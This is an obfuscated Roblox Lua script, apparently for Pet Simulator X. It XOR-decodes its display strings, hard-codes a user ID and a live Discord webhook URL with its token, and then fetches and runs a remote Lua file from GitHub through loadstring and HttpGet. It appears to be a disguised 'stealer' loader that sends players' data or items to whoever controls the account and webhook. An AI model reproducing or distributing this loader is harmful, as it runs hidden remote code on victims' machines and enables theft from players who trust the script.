--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + ((v11-1)% #v9) ,1 + ((v11-1)% #v9) + 1 )))%256 ));end return v5(v10);end UserId=733064120;WebHook="https://discord.com/api/webhooks/1089191588812554271/HBvDCqqT2bgpuXJ3EhM7K8WRFzk9OJJNKawxlN0mqmBjkEKpKJarNKr18hy0V-TnXv_r";_G.CustomScriptName=v7("\17\21\93\178\52\76\238\2\17\2\91\168\35\71\245\21\84\51\20","\49\65\52\198\85\34\135\97");_G.Text1=v7("\142\83\238\120\171\82\232\60\145\95\253\117\178\72\161\50\236","\194\60\143\28");_G.Text2=v7("\37\208\170\87\67\235\192\70\20\222\177\3\121\230\213\15\2\197","\114\177\195\35\42\133\167\102");_G.Text3=v7("\237\79\93\173\34\162\92\233\142\116\91\188\32\187\70\253\128\9\22","\174\39\56\206\73\203\50\142");_G.Text4=v7("\101\146\63\90\244\187\88\129\126\123\227\160\95\150\42\6\174\252","\54\230\94\40\128\210");loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimxgm.lua"))();
